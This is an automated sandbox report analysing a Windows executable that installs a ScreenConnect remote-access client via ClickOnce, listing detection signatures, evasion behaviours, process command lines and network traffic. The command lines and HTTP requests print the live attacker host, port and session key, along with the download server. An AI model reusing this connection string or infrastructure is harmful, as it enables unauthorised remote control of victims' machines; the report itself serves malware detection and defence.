Windows Analysis Report
3coxOaV92n.exe

Overview

General Information

Sample name: 3coxOaV92n.exe
renamed because original name is a hash value
Original sample name: 8b6c29b6418b96950df0f4d56e90f1d1b25c08ced164e8a3f83b61601a674c71.exe
Analysis ID: 1542318
MD5: 8baaa006991b70783ed369d3ca853ca3
SHA1: c4821ff42774877ea91eb582da7a98cbea853dae
SHA256: 8b6c29b6418b96950df0f4d56e90f1d1b25c08ced164e8a3f83b61601a674c71
Tags: exe, secure-stansup-com, signed, user-JAMESWT_MHT

Detection

ScreenConnect Tool
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 33
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • 3coxOaV92n.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\3coxOaV92n.exe" MD5: 8BAAA006991B70783ED369D3CA853CA3)
    • dfsvc.exe (PID: 3056 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
        • ScreenConnect.ClientService.exe (PID: 5244 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • WerFault.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6620 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 6520 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 940 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1" MD5: 200A917996F0FC74879076354454473A)
    • ScreenConnect.WindowsClient.exe (PID: 7080 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
    • ScreenConnect.WindowsClient.exe (PID: 6572 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System" MD5: D95CC7E6F8EC5DDE28E1EFFA58E7AC8D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 3056 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1816 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Source | Rule | Description | Author | Strings
9.0.ScreenConnect.WindowsClient.exe.c10000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

System Summary

                  Source: Network Connection | Author: Nasreddine Bencherchali (Nextron Systems) | Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49705, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 3056, Protocol: tcp, SourceIp: 79.110.49.185, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 6620, ProcessName: svchost.exe

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-10-25T19:29:27.806051+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49722 | TCP
                  2024-10-25T19:29:29.798570+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49723 | TCP
                  2024-10-25T19:29:35.382472+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49732 | TCP
                  2024-10-25T19:29:37.121763+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49735 | TCP
                  2024-10-25T19:29:39.555616+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49753 | TCP
                  2024-10-25T19:29:45.467567+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49780 | TCP
                  2024-10-25T19:29:46.823210+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49791 | TCP
                  2024-10-25T19:29:49.300665+0200 | 2009897 | 1 | A Network Trojan was detected | 79.110.49.185 | 443 | 192.168.2.5 | 49803 | TCP

AV Detection

                  Source: 3coxOaV92n.exe | ReversingLabs: Detection: 23%
                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 86.3% probability
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Code function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe

Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | EXE: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe
                  Source: 3coxOaV92n.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 3coxOaV92n.exe | Static PE information: certificate valid
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49727 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49735 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49791 version: TLS 1.2
                  Source: 3coxOaV92n.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: 3coxOaV92n.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100089000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420666021.0000000005142000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3285857919.0000000002411000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474543224.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2474342978.0000000001290000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbg\ source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2408865216.0000000000C6D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1005A4000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2423985826.000000001BE92000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb] source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10023D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421902019.0000000002E32000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100085000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2420807529.00000000051F2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Code function: 0_2_00AC4A4B FindFirstFileExA,0_2_00AC4A4B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe | File opened: C:\Users\user\AppData\Local\Apps\

Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe | Registry value created: NULL Service
                  Source: global traffic | TCP traffic: 192.168.2.5:49839 -> 79.110.49.185:8041
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip
                  Source: global traffic | HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: secure.stansup.com Accept-Encoding: gzip
                  Source: Joe Sandbox View | IP Address: 79.110.49.185 79.110.49.185
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49722
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49735
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49732
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49723
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49780
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49803
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49791
                  Source: Network traffic | Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 79.110.49.185:443 -> 192.168.2.5:49753
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: secure.stansup.com
                  Source: global traffic | DNS traffic detected: DNS query: kjh231a.zapto.org
                  Source: svchost.exe, 00000007.00000003.2203491408.000002487B579000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/STS
                  Source: svchost.exe, 00000007.00000002.3285828510.000002487BC3C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/STS</ds:KeyName></ds:KeyInfo><Ciph
                  Source: svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsd
                  Source: svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285503352.000002487B500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284820423.000002487AC74000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281238846.000002487BCFA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2281301768.000002487BC09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285785350.000002487BC0A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb:pp
                  Source: svchost.exe, 00000007.00000002.3285134135.000002487ACC6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://Passport.NET/tb_
